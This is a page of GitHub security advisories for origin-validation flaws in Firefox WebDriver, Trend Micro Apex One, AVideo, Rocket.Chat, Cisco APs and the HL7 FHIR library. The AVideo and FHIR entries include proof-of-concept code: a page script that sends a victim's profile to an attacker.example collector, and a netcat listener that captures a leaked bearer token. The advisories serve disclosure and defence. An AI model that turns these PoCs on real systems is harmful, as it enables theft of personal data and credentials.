CWE-346
Allowed-with-ReviewOrigin Validation Error
Abstraction: Class · Status: Draft
The product does not properly verify that the source of data or communication is valid.
789 vulnerabilities reference this CWE, most recent first.
GHSA-FC8F-JHCW-P24V
Vulnerability from github – Published: 2022-12-22 21:30 – Updated: 2025-04-16 15:34Remote Agent, used in WebDriver, did not validate the Host or Origin headers. This could have allowed websites to connect back locally to the user's browser to control it.
This bug only affected Firefox when WebDriver was enabled, which is not the default configuration.. This vulnerability affects Firefox < 97.
{
"affected": [],
"aliases": [
"CVE-2022-22757"
],
"database_specific": {
"cwe_ids": [
"CWE-20",
"CWE-345",
"CWE-346"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2022-12-22T20:15:00Z",
"severity": "MODERATE"
},
"details": "Remote Agent, used in WebDriver, did not validate the Host or Origin headers. This could have allowed websites to connect back locally to the user\u0027s browser to control it. \u003cbr\u003e*This bug only affected Firefox when WebDriver was enabled, which is not the default configuration.*. This vulnerability affects Firefox \u003c 97.",
"id": "GHSA-fc8f-jhcw-p24v",
"modified": "2025-04-16T15:34:06Z",
"published": "2022-12-22T21:30:30Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2022-22757"
},
{
"type": "WEB",
"url": "https://bugzilla.mozilla.org/show_bug.cgi?id=1720098"
},
{
"type": "WEB",
"url": "https://www.mozilla.org/security/advisories/mfsa2022-04"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N",
"type": "CVSS_V3"
}
]
}
GHSA-FF4M-QXJH-Q4CW
Vulnerability from github – Published: 2026-05-21 15:34 – Updated: 2026-05-21 15:34An origin validation vulnerability in the Apex One/SEP agent could allow a local attacker to escalate privileges on affected installations. This is similar to CVE-2026-34927 but exists in a different inter-process communication mechanism.
Please note: an attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability.
{
"affected": [],
"aliases": [
"CVE-2026-34929"
],
"database_specific": {
"cwe_ids": [
"CWE-346"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2026-05-21T14:16:45Z",
"severity": "HIGH"
},
"details": "An origin validation vulnerability in the Apex One/SEP agent could allow a local attacker to escalate privileges on affected installations. This is similar to CVE-2026-34927 but exists in a different inter-process communication mechanism.\n\nPlease note: an attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability.",
"id": "GHSA-ff4m-qxjh-q4cw",
"modified": "2026-05-21T15:34:09Z",
"published": "2026-05-21T15:34:09Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-34929"
},
{
"type": "WEB",
"url": "https://success.trendmicro.com/en-US/solution/KA-0023430"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
}
]
}
GHSA-FF5Q-CC22-FGP4
Vulnerability from github – Published: 2026-04-14 23:18 – Updated: 2026-04-24 20:40Summary
The CORS origin validation fix in commit 986e64aad is incomplete. Two separate code paths still reflect arbitrary Origin headers with credentials allowed for all /api/* endpoints: (1) plugin/API/router.php lines 4-8 unconditionally reflect any origin before application code runs, and (2) allowOrigin(true) called by get.json.php and set.json.php reflects any origin with Access-Control-Allow-Credentials: true. An attacker can make cross-origin credentialed requests to any API endpoint and read authenticated responses containing user PII, email, admin status, and session-sensitive data.
Details
Bypass Vector 1: router.php independent CORS handler
plugin/API/router.php:4-8 runs before any application code:
// plugin/API/router.php lines 4-8
$HTTP_ORIGIN = empty($_SERVER['HTTP_ORIGIN']) ? @$_SERVER['HTTP_REFERER'] : $_SERVER['HTTP_ORIGIN'];
if (empty($HTTP_ORIGIN)) {
header('Access-Control-Allow-Origin: *');
} else {
header("Access-Control-Allow-Origin: " . $HTTP_ORIGIN);
}
This reflects any Origin header verbatim. For OPTIONS preflight requests (lines 14-18), the script exits immediately — the fixed allowOrigin() function never executes:
// plugin/API/router.php lines 14-18
if ($_SERVER['REQUEST_METHOD'] === 'OPTIONS') {
header("Access-Control-Max-Age: 86400");
http_response_code(200);
exit;
}
All /api/* requests are routed through this file via .htaccess rules (lines 131-132).
Bypass Vector 2: allowOrigin($allowAll=true)
Both plugin/API/get.json.php:12 and plugin/API/set.json.php:12 call allowOrigin(true). In objects/functions.php:2773-2790, the $allowAll=true code path reflects any origin with credentials:
// objects/functions.php lines 2773-2777
if ($allowAll) {
$requestOrigin = $_SERVER['HTTP_ORIGIN'] ?? '';
if (!empty($requestOrigin)) {
header('Access-Control-Allow-Origin: ' . $requestOrigin);
header('Access-Control-Allow-Credentials: true');
}
This code path was untouched by commit 986e64aad, which only hardened the default ($allowAll=false) path.
Impact on data exposure
Because the victim's session cookies are sent with credentialed cross-origin requests, User::isLogged() returns true and User::getId() returns the victim's user ID. This means:
- Video listing endpoint (
get_api_video): Sensitive user fields (email, isAdmin, etc.) are only stripped for unauthenticated requests (functions.php:1752), so authenticated CORS requests receive the full data. - User profile endpoint (
get_api_user): When$isViewingOwnProfileis true (line 3039), all sensitive fields including email, admin status, recovery tokens, and PII are returned unstripped.
Additional issue: Referer header fallback
router.php line 4 falls back to HTTP_REFERER when HTTP_ORIGIN is absent, injecting an attacker-controlled full URL (not just origin) into the Access-Control-Allow-Origin header. This is non-standard and could cause unexpected behavior.
PoC
Step 1: Host the following HTML on an attacker-controlled domain:
<html>
<body>
<h1>AVideo CORS PoC</h1>
<script>
// Exfiltrate victim's user profile (email, admin status, PII)
fetch('https://target-avideo.example/api/user', {
credentials: 'include'
})
.then(r => r.json())
.then(data => {
document.getElementById('result').textContent = JSON.stringify(data, null, 2);
// Exfiltrate to attacker server
navigator.sendBeacon('https://attacker.example/collect', JSON.stringify(data));
});
</script>
<pre id="result">Loading...</pre>
</body>
</html>
Step 2: Victim visits attacker page while logged into AVideo.
Step 3: The browser sends the request with victim's session cookies. router.php line 8 reflects the attacker's origin. get.json.php calls allowOrigin(true) which re-sets Access-Control-Allow-Origin to the attacker's origin with Access-Control-Allow-Credentials: true.
Step 4: Browser permits cross-origin reading. Attacker receives the victim's full user profile including email, name, address, phone, admin status, and other PII.
For set endpoints (POST with custom headers requiring preflight):
fetch('https://target-avideo.example/api/SomeSetEndpoint', {
method: 'POST',
credentials: 'include',
headers: {'Content-Type': 'application/json'},
body: JSON.stringify({/* parameters */})
});
The preflight OPTIONS is handled by router.php lines 14-18, which reflect the origin and exit — the CORS fix in allowOrigin() never runs.
Impact
- Data theft: Any third-party website can read authenticated API responses for any logged-in AVideo user. This includes user profile data (email, real name, address, phone, admin status), video listings with creator PII, and other session-specific data.
- Account information disclosure: The user profile endpoint returns the full user record including
recoverPass(password recovery token),isAdminstatus, and all PII fields when accessed as the authenticated user. - Action on behalf of user: Write endpoints (
set.json.php) are equally affected, allowing cross-origin state-changing requests (creating playlists, modifying content, etc.) with the victim's session. - Bypass of intentional fix: This directly circumvents the CORS hardening in commit
986e64aad.
Recommended Fix
1. Remove the independent CORS handler from router.php and let allowOrigin() handle all CORS logic consistently:
// plugin/API/router.php - REMOVE lines 4-18, replace with:
// CORS is handled by allowOrigin() in get.json.php / set.json.php
// For OPTIONS preflight, we still need to handle it, but through allowOrigin():
if ($_SERVER['REQUEST_METHOD'] === 'OPTIONS') {
require_once __DIR__.'/../../videos/configuration.php';
allowOrigin(false); // Use the validated CORS handler
header("Access-Control-Max-Age: 86400");
http_response_code(204);
exit;
}
2. Fix allowOrigin($allowAll=true) to validate origins — or stop using it for API endpoints:
// In get.json.php and set.json.php, change:
allowOrigin(true);
// To:
allowOrigin(false); // Use validated CORS for API endpoints
Keep allowOrigin(true) only for genuinely public endpoints that return no session-sensitive data (VAST/VMAP ad XML).
3. As defense-in-depth, set SameSite=Lax on session cookies to prevent browsers from sending them on cross-origin requests by default.
{
"affected": [
{
"package": {
"ecosystem": "Packagist",
"name": "wwbn/avideo"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"last_affected": "29.0"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2026-41057"
],
"database_specific": {
"cwe_ids": [
"CWE-346"
],
"github_reviewed": true,
"github_reviewed_at": "2026-04-14T23:18:28Z",
"nvd_published_at": "2026-04-21T23:16:20Z",
"severity": "HIGH"
},
"details": "## Summary\n\nThe CORS origin validation fix in commit `986e64aad` is incomplete. Two separate code paths still reflect arbitrary `Origin` headers with credentials allowed for all `/api/*` endpoints: (1) `plugin/API/router.php` lines 4-8 unconditionally reflect any origin before application code runs, and (2) `allowOrigin(true)` called by `get.json.php` and `set.json.php` reflects any origin with `Access-Control-Allow-Credentials: true`. An attacker can make cross-origin credentialed requests to any API endpoint and read authenticated responses containing user PII, email, admin status, and session-sensitive data.\n\n## Details\n\n### Bypass Vector 1: router.php independent CORS handler\n\n`plugin/API/router.php:4-8` runs before any application code:\n\n```php\n// plugin/API/router.php lines 4-8\n$HTTP_ORIGIN = empty($_SERVER[\u0027HTTP_ORIGIN\u0027]) ? @$_SERVER[\u0027HTTP_REFERER\u0027] : $_SERVER[\u0027HTTP_ORIGIN\u0027];\nif (empty($HTTP_ORIGIN)) {\n header(\u0027Access-Control-Allow-Origin: *\u0027);\n} else {\n header(\"Access-Control-Allow-Origin: \" . $HTTP_ORIGIN);\n}\n```\n\nThis reflects **any** `Origin` header verbatim. For OPTIONS preflight requests (lines 14-18), the script exits immediately \u2014 the fixed `allowOrigin()` function never executes:\n\n```php\n// plugin/API/router.php lines 14-18\nif ($_SERVER[\u0027REQUEST_METHOD\u0027] === \u0027OPTIONS\u0027) {\n header(\"Access-Control-Max-Age: 86400\");\n http_response_code(200);\n exit;\n}\n```\n\nAll `/api/*` requests are routed through this file via `.htaccess` rules (lines 131-132).\n\n### Bypass Vector 2: allowOrigin($allowAll=true)\n\nBoth `plugin/API/get.json.php:12` and `plugin/API/set.json.php:12` call `allowOrigin(true)`. In `objects/functions.php:2773-2790`, the `$allowAll=true` code path reflects any origin with credentials:\n\n```php\n// objects/functions.php lines 2773-2777\nif ($allowAll) {\n $requestOrigin = $_SERVER[\u0027HTTP_ORIGIN\u0027] ?? \u0027\u0027;\n if (!empty($requestOrigin)) {\n header(\u0027Access-Control-Allow-Origin: \u0027 . $requestOrigin);\n header(\u0027Access-Control-Allow-Credentials: true\u0027);\n }\n```\n\nThis code path was **untouched** by commit `986e64aad`, which only hardened the default (`$allowAll=false`) path.\n\n### Impact on data exposure\n\nBecause the victim\u0027s session cookies are sent with credentialed cross-origin requests, `User::isLogged()` returns true and `User::getId()` returns the victim\u0027s user ID. This means:\n\n- **Video listing endpoint** (`get_api_video`): Sensitive user fields (email, isAdmin, etc.) are only stripped for unauthenticated requests (`functions.php:1752`), so authenticated CORS requests receive the full data.\n- **User profile endpoint** (`get_api_user`): When `$isViewingOwnProfile` is true (line 3039), all sensitive fields including email, admin status, recovery tokens, and PII are returned unstripped.\n\n### Additional issue: Referer header fallback\n\n`router.php` line 4 falls back to `HTTP_REFERER` when `HTTP_ORIGIN` is absent, injecting an attacker-controlled full URL (not just origin) into the `Access-Control-Allow-Origin` header. This is non-standard and could cause unexpected behavior.\n\n## PoC\n\n**Step 1:** Host the following HTML on an attacker-controlled domain:\n\n```html\n\u003chtml\u003e\n\u003cbody\u003e\n\u003ch1\u003eAVideo CORS PoC\u003c/h1\u003e\n\u003cscript\u003e\n// Exfiltrate victim\u0027s user profile (email, admin status, PII)\nfetch(\u0027https://target-avideo.example/api/user\u0027, {\n credentials: \u0027include\u0027\n})\n.then(r =\u003e r.json())\n.then(data =\u003e {\n document.getElementById(\u0027result\u0027).textContent = JSON.stringify(data, null, 2);\n // Exfiltrate to attacker server\n navigator.sendBeacon(\u0027https://attacker.example/collect\u0027, JSON.stringify(data));\n});\n\u003c/script\u003e\n\u003cpre id=\"result\"\u003eLoading...\u003c/pre\u003e\n\u003c/body\u003e\n\u003c/html\u003e\n```\n\n**Step 2:** Victim visits attacker page while logged into AVideo.\n\n**Step 3:** The browser sends the request with victim\u0027s session cookies. `router.php` line 8 reflects the attacker\u0027s origin. `get.json.php` calls `allowOrigin(true)` which re-sets `Access-Control-Allow-Origin` to the attacker\u0027s origin with `Access-Control-Allow-Credentials: true`.\n\n**Step 4:** Browser permits cross-origin reading. Attacker receives the victim\u0027s full user profile including email, name, address, phone, admin status, and other PII.\n\n**For set endpoints (POST with custom headers requiring preflight):**\n\n```javascript\nfetch(\u0027https://target-avideo.example/api/SomeSetEndpoint\u0027, {\n method: \u0027POST\u0027,\n credentials: \u0027include\u0027,\n headers: {\u0027Content-Type\u0027: \u0027application/json\u0027},\n body: JSON.stringify({/* parameters */})\n});\n```\n\nThe preflight OPTIONS is handled by `router.php` lines 14-18, which reflect the origin and exit \u2014 the CORS fix in `allowOrigin()` never runs.\n\n## Impact\n\n- **Data theft**: Any third-party website can read authenticated API responses for any logged-in AVideo user. This includes user profile data (email, real name, address, phone, admin status), video listings with creator PII, and other session-specific data.\n- **Account information disclosure**: The user profile endpoint returns the full user record including `recoverPass` (password recovery token), `isAdmin` status, and all PII fields when accessed as the authenticated user.\n- **Action on behalf of user**: Write endpoints (`set.json.php`) are equally affected, allowing cross-origin state-changing requests (creating playlists, modifying content, etc.) with the victim\u0027s session.\n- **Bypass of intentional fix**: This directly circumvents the CORS hardening in commit `986e64aad`.\n\n## Recommended Fix\n\n**1. Remove the independent CORS handler from `router.php`** and let `allowOrigin()` handle all CORS logic consistently:\n\n```php\n// plugin/API/router.php - REMOVE lines 4-18, replace with:\n// CORS is handled by allowOrigin() in get.json.php / set.json.php\n// For OPTIONS preflight, we still need to handle it, but through allowOrigin():\nif ($_SERVER[\u0027REQUEST_METHOD\u0027] === \u0027OPTIONS\u0027) {\n require_once __DIR__.\u0027/../../videos/configuration.php\u0027;\n allowOrigin(false); // Use the validated CORS handler\n header(\"Access-Control-Max-Age: 86400\");\n http_response_code(204);\n exit;\n}\n```\n\n**2. Fix `allowOrigin($allowAll=true)` to validate origins** \u2014 or stop using it for API endpoints:\n\n```php\n// In get.json.php and set.json.php, change:\nallowOrigin(true);\n// To:\nallowOrigin(false); // Use validated CORS for API endpoints\n```\n\nKeep `allowOrigin(true)` only for genuinely public endpoints that return no session-sensitive data (VAST/VMAP ad XML).\n\n**3. As defense-in-depth**, set `SameSite=Lax` on session cookies to prevent browsers from sending them on cross-origin requests by default.",
"id": "GHSA-ff5q-cc22-fgp4",
"modified": "2026-04-24T20:40:48Z",
"published": "2026-04-14T23:18:28Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/WWBN/AVideo/security/advisories/GHSA-ff5q-cc22-fgp4"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-41057"
},
{
"type": "WEB",
"url": "https://github.com/WWBN/AVideo/commit/5e2b897ccac61eb6daca2dee4a6be3c4c2d93e13"
},
{
"type": "PACKAGE",
"url": "https://github.com/WWBN/AVideo"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:L/A:N",
"type": "CVSS_V3"
}
],
"summary": "WWBN AVideo has a CORS Origin Reflection Bypass via plugin/API/router.php and allowOrigin(true) Exposes Authenticated API Responses"
}
GHSA-FGC6-VR5X-6XCH
Vulnerability from github – Published: 2023-05-10 00:30 – Updated: 2024-04-04 03:58A vulnerability has been discovered in Rocket.Chat, where messages can be hidden regardless of the Message_KeepHistory or Message_ShowDeletedStatus server configuration. This allows users to bypass the intended message deletion behavior, hiding messages and deletion notices.
{
"affected": [],
"aliases": [
"CVE-2023-28318"
],
"database_specific": {
"cwe_ids": [
"CWE-285",
"CWE-346"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2023-05-09T22:15:10Z",
"severity": "MODERATE"
},
"details": "A vulnerability has been discovered in Rocket.Chat, where messages can be hidden regardless of the Message_KeepHistory or Message_ShowDeletedStatus server configuration. This allows users to bypass the intended message deletion behavior, hiding messages and deletion notices.",
"id": "GHSA-fgc6-vr5x-6xch",
"modified": "2024-04-04T03:58:14Z",
"published": "2023-05-10T00:30:16Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2023-28318"
},
{
"type": "WEB",
"url": "https://hackerone.com/reports/1379451"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N",
"type": "CVSS_V3"
}
]
}
GHSA-FGG9-9Q62-GFXM
Vulnerability from github – Published: 2025-09-24 18:30 – Updated: 2025-09-24 18:30A vulnerability in the Device Analytics action frame processing of Cisco Wireless Access Point (AP) Software could allow an unauthenticated, adjacent attacker to inject wireless 802.11 action frames with arbitrary information.
This vulnerability is due to insufficient verification checks of incoming 802.11 action frames. An attacker could exploit this vulnerability by sending 802.11 Device Analytics action frames with arbitrary parameters. A successful exploit could allow the attacker to inject Device Analytics action frames with arbitrary information, which could modify the Device Analytics data of valid wireless clients that are connected to the same wireless controller.
{
"affected": [],
"aliases": [
"CVE-2025-20364"
],
"database_specific": {
"cwe_ids": [
"CWE-346"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2025-09-24T17:15:40Z",
"severity": "MODERATE"
},
"details": "A vulnerability in the Device Analytics action frame processing of Cisco Wireless Access Point (AP) Software could allow an unauthenticated, adjacent attacker to inject wireless 802.11 action frames with arbitrary information.\n\n This vulnerability is due to insufficient verification checks of incoming 802.11 action frames. An attacker could exploit this vulnerability by sending 802.11 Device Analytics action frames with arbitrary parameters. A successful exploit could allow the attacker to inject Device Analytics action frames with arbitrary information, which could modify the Device Analytics data of valid wireless clients that are connected to the same wireless controller.",
"id": "GHSA-fgg9-9q62-gfxm",
"modified": "2025-09-24T18:30:31Z",
"published": "2025-09-24T18:30:31Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-20364"
},
{
"type": "WEB",
"url": "https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-action-frame-inj-QqCNcz8H"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N",
"type": "CVSS_V3"
}
]
}
GHSA-FGV2-4Q4G-WC35
Vulnerability from github – Published: 2026-03-30 17:19 – Updated: 2026-03-31 18:55Summary
ManagedWebAccessUtils.getServer() uses String.startsWith() to match request URLs against configured server URLs for authentication credential dispatch. Because configured server URLs (e.g., http://tx.fhir.org) lack a trailing slash or host boundary check, an attacker-controlled domain like http://tx.fhir.org.attacker.com matches the prefix and receives Bearer tokens, Basic auth credentials, or API keys when the HTTP client follows a redirect to that domain.
Details
The root cause is in ManagedWebAccessUtils.getServer() at org.hl7.fhir.utilities/src/main/java/org/hl7/fhir/utilities/http/ManagedWebAccessUtils.java:26:
public static ServerDetailsPOJO getServer(String url, Iterable<ServerDetailsPOJO> serverAuthDetails) {
if (serverAuthDetails != null) {
for (ServerDetailsPOJO serverDetails : serverAuthDetails) {
if (url.startsWith(serverDetails.getUrl())) { // <-- no host boundary check
return serverDetails;
}
}
}
return null;
}
The configured production terminology server URL is defined without a trailing slash in FhirSettingsPOJO.java:19:
protected static final String TX_SERVER_PROD = "http://tx.fhir.org";
This means:
- "http://tx.fhir.org.attacker.com/capture".startsWith("http://tx.fhir.org") → true
- "http://tx.fhir.org:8080/evil".startsWith("http://tx.fhir.org") → true
Exploit chain via SimpleHTTPClient (redirect path):
SimpleHTTPClient.get()(SimpleHTTPClient.java:68-105) makes a request tohttp://tx.fhir.org/ValueSet/$expand- On each redirect, the loop calls
getHttpGetConnection(url, accept)(line 84) →setHeaders(connection)(line 117) setHeaders()(line 122-133) callsauthProvider.canProvideHeaders(url)andauthProvider.getHeaders(url)on the redirect target URLServerDetailsPOJOHTTPAuthProvider.getServerDetails()(line 83-84) delegates toManagedWebAccessUtils.getServer(url.toString(), servers)- The
startsWith()check matcheshttp://tx.fhir.org.attacker.comagainsthttp://tx.fhir.org - Credentials are dispatched to the attacker's server via
ServerDetailsPOJOHTTPAuthProvider.getHeaders()(lines 38-58): - Bearer tokens:
Authorization: Bearer {token} - Basic auth:
Authorization: Basic {base64(user:pass)} - API keys:
Api-Key: {apikey} - Custom headers from server config
Note: An earlier fix (commit 6b615880 "Strip headers on redirect") added an isNotSameHost() check, but this was removed in commit 3871cc69 ("Rework authorization providers in ManagedWebAccess"). The current code on master has no host validation during redirect following.
Exploit chain via ManagedFhirWebAccessor (OkHttp path):
ManagedFhirWebAccessor.httpCall() (line 81-112) sets auth headers via requestWithAuthorizationHeaders() before passing the request to OkHttpClient. OkHttpClient follows redirects by default (up to 20) and carries the pre-set auth headers to all redirect targets. The same startsWith() check in canProvideHeaders() applies.
The same vulnerable pattern also exists in ManagedWebAccess.isLocal() (line 214), where url.startsWith(server.getUrl()) is used to determine whether HTTP (non-TLS) access is allowed, potentially enabling TLS downgrade for attacker-controlled domains that match the prefix.
PoC
Step 1: Verify the prefix match behavior
// This demonstrates the core vulnerability
String configuredUrl = "http://tx.fhir.org"; // FhirSettingsPOJO.TX_SERVER_PROD
String attackerUrl = "http://tx.fhir.org.attacker.com/capture";
System.out.println(attackerUrl.startsWith(configuredUrl));
// Output: true
Step 2: Demonstrate credential dispatch to wrong host
Given a fhir-settings.json configuration at ~/.fhir/fhir-settings.json:
{
"servers": [
{
"url": "http://tx.fhir.org",
"authenticationType": "token",
"token": "secret-bearer-token-12345"
}
]
}
When SimpleHTTPClient.get("http://tx.fhir.org/ValueSet/$expand") follows a 302 redirect to http://tx.fhir.org.attacker.com/capture:
setHeaders()is called with the redirect target URLauthProvider.canProvideHeaders(new URL("http://tx.fhir.org.attacker.com/capture"))returnstrueauthProvider.getHeaders(...)returns{"Authorization": "Bearer secret-bearer-token-12345"}- The
Authorizationheader with the secret token is sent totx.fhir.org.attacker.com
Step 3: Attacker captures the credential
# On attacker-controlled server (tx.fhir.org.attacker.com)
nc -l -p 80 | head -20
# Output includes:
# GET /capture HTTP/1.1
# Host: tx.fhir.org.attacker.com
# Authorization: Bearer secret-bearer-token-12345
Impact
- Credential theft: Bearer tokens, Basic authentication passwords, API keys, and custom authentication headers configured for FHIR terminology servers can be exfiltrated by an attacker who can inject a redirect (via MITM, compromised CDN, or DNS poisoning).
- Impersonation: Stolen credentials allow an attacker to make authenticated requests to the legitimate FHIR server, potentially accessing or modifying clinical terminology data.
- Broad exposure: The FHIR Validator is widely used in healthcare IT for validating FHIR resources. Any deployment that configures server authentication in
fhir-settings.jsonand makes outbound HTTP requests to terminology servers is affected. - TLS downgrade: The same
startsWith()pattern inManagedWebAccess.isLocal()could allow an attacker-controlled domain to be treated as "local," bypassing the HTTPS enforcement.
Recommended Fix
Replace the startsWith() check in ManagedWebAccessUtils.getServer() with proper URL host boundary validation:
public static ServerDetailsPOJO getServer(String url, Iterable<ServerDetailsPOJO> serverAuthDetails) {
if (serverAuthDetails != null) {
for (ServerDetailsPOJO serverDetails : serverAuthDetails) {
if (urlMatchesServer(url, serverDetails.getUrl())) {
return serverDetails;
}
}
}
return null;
}
/**
* Check if a URL matches a configured server URL with proper host boundary validation.
* After the configured prefix, the next character must be '/', '?', '#', ':', or end-of-string.
*/
private static boolean urlMatchesServer(String url, String serverUrl) {
if (url == null || serverUrl == null) return false;
if (!url.startsWith(serverUrl)) return false;
if (url.length() == serverUrl.length()) return true;
char nextChar = url.charAt(serverUrl.length());
return nextChar == '/' || nextChar == '?' || nextChar == '#' || nextChar == ':';
}
Apply the same fix to ManagedWebAccess.isLocal() at line 214 and the three-argument getServer() overload at line 14.
Additionally, consider re-introducing the host-equality check for redirects in SimpleHTTPClient (as was previously implemented in commit 6b615880 but removed in 3871cc69) to provide defense-in-depth against credential leakage on cross-origin redirects.
{
"affected": [
{
"package": {
"ecosystem": "Maven",
"name": "ca.uhn.hapi.fhir:org.hl7.fhir.core"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "6.9.4"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "Maven",
"name": "ca.uhn.hapi.fhir:org.hl7.fhir.utilities"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "6.9.4"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2026-34359"
],
"database_specific": {
"cwe_ids": [
"CWE-346"
],
"github_reviewed": true,
"github_reviewed_at": "2026-03-30T17:19:21Z",
"nvd_published_at": "2026-03-31T17:16:31Z",
"severity": "HIGH"
},
"details": "## Summary\n\n`ManagedWebAccessUtils.getServer()` uses `String.startsWith()` to match request URLs against configured server URLs for authentication credential dispatch. Because configured server URLs (e.g., `http://tx.fhir.org`) lack a trailing slash or host boundary check, an attacker-controlled domain like `http://tx.fhir.org.attacker.com` matches the prefix and receives Bearer tokens, Basic auth credentials, or API keys when the HTTP client follows a redirect to that domain.\n\n## Details\n\nThe root cause is in `ManagedWebAccessUtils.getServer()` at `org.hl7.fhir.utilities/src/main/java/org/hl7/fhir/utilities/http/ManagedWebAccessUtils.java:26`:\n\n```java\npublic static ServerDetailsPOJO getServer(String url, Iterable\u003cServerDetailsPOJO\u003e serverAuthDetails) {\n if (serverAuthDetails != null) {\n for (ServerDetailsPOJO serverDetails : serverAuthDetails) {\n if (url.startsWith(serverDetails.getUrl())) { // \u003c-- no host boundary check\n return serverDetails;\n }\n }\n }\n return null;\n}\n```\n\nThe configured production terminology server URL is defined without a trailing slash in `FhirSettingsPOJO.java:19`:\n\n```java\nprotected static final String TX_SERVER_PROD = \"http://tx.fhir.org\";\n```\n\nThis means:\n- `\"http://tx.fhir.org.attacker.com/capture\".startsWith(\"http://tx.fhir.org\")` \u2192 **true**\n- `\"http://tx.fhir.org:8080/evil\".startsWith(\"http://tx.fhir.org\")` \u2192 **true**\n\n**Exploit chain via SimpleHTTPClient (redirect path):**\n\n1. `SimpleHTTPClient.get()` (`SimpleHTTPClient.java:68-105`) makes a request to `http://tx.fhir.org/ValueSet/$expand`\n2. On each redirect, the loop calls `getHttpGetConnection(url, accept)` (line 84) \u2192 `setHeaders(connection)` (line 117)\n3. `setHeaders()` (line 122-133) calls `authProvider.canProvideHeaders(url)` and `authProvider.getHeaders(url)` on the **redirect target URL**\n4. `ServerDetailsPOJOHTTPAuthProvider.getServerDetails()` (line 83-84) delegates to `ManagedWebAccessUtils.getServer(url.toString(), servers)`\n5. The `startsWith()` check matches `http://tx.fhir.org.attacker.com` against `http://tx.fhir.org`\n6. Credentials are dispatched to the attacker\u0027s server via `ServerDetailsPOJOHTTPAuthProvider.getHeaders()` (lines 38-58):\n - Bearer tokens: `Authorization: Bearer {token}`\n - Basic auth: `Authorization: Basic {base64(user:pass)}`\n - API keys: `Api-Key: {apikey}`\n - Custom headers from server config\n\nNote: An earlier fix (commit `6b615880` \"Strip headers on redirect\") added an `isNotSameHost()` check, but this was **removed** in commit `3871cc69` (\"Rework authorization providers in ManagedWebAccess\"). The current code on master has no host validation during redirect following.\n\n**Exploit chain via ManagedFhirWebAccessor (OkHttp path):**\n\n`ManagedFhirWebAccessor.httpCall()` (line 81-112) sets auth headers via `requestWithAuthorizationHeaders()` before passing the request to OkHttpClient. OkHttpClient follows redirects by default (up to 20) and carries the pre-set auth headers to all redirect targets. The same `startsWith()` check in `canProvideHeaders()` applies.\n\nThe same vulnerable pattern also exists in `ManagedWebAccess.isLocal()` (line 214), where `url.startsWith(server.getUrl())` is used to determine whether HTTP (non-TLS) access is allowed, potentially enabling TLS downgrade for attacker-controlled domains that match the prefix.\n\n## PoC\n\n**Step 1: Verify the prefix match behavior**\n\n```java\n// This demonstrates the core vulnerability\nString configuredUrl = \"http://tx.fhir.org\"; // FhirSettingsPOJO.TX_SERVER_PROD\nString attackerUrl = \"http://tx.fhir.org.attacker.com/capture\";\n\nSystem.out.println(attackerUrl.startsWith(configuredUrl));\n// Output: true\n```\n\n**Step 2: Demonstrate credential dispatch to wrong host**\n\nGiven a `fhir-settings.json` configuration at `~/.fhir/fhir-settings.json`:\n```json\n{\n \"servers\": [\n {\n \"url\": \"http://tx.fhir.org\",\n \"authenticationType\": \"token\",\n \"token\": \"secret-bearer-token-12345\"\n }\n ]\n}\n```\n\nWhen `SimpleHTTPClient.get(\"http://tx.fhir.org/ValueSet/$expand\")` follows a 302 redirect to `http://tx.fhir.org.attacker.com/capture`:\n\n1. `setHeaders()` is called with the redirect target URL\n2. `authProvider.canProvideHeaders(new URL(\"http://tx.fhir.org.attacker.com/capture\"))` returns `true`\n3. `authProvider.getHeaders(...)` returns `{\"Authorization\": \"Bearer secret-bearer-token-12345\"}`\n4. The `Authorization` header with the secret token is sent to `tx.fhir.org.attacker.com`\n\n**Step 3: Attacker captures the credential**\n\n```bash\n# On attacker-controlled server (tx.fhir.org.attacker.com)\nnc -l -p 80 | head -20\n# Output includes:\n# GET /capture HTTP/1.1\n# Host: tx.fhir.org.attacker.com\n# Authorization: Bearer secret-bearer-token-12345\n```\n\n## Impact\n\n- **Credential theft**: Bearer tokens, Basic authentication passwords, API keys, and custom authentication headers configured for FHIR terminology servers can be exfiltrated by an attacker who can inject a redirect (via MITM, compromised CDN, or DNS poisoning).\n- **Impersonation**: Stolen credentials allow an attacker to make authenticated requests to the legitimate FHIR server, potentially accessing or modifying clinical terminology data.\n- **Broad exposure**: The FHIR Validator is widely used in healthcare IT for validating FHIR resources. Any deployment that configures server authentication in `fhir-settings.json` and makes outbound HTTP requests to terminology servers is affected.\n- **TLS downgrade**: The same 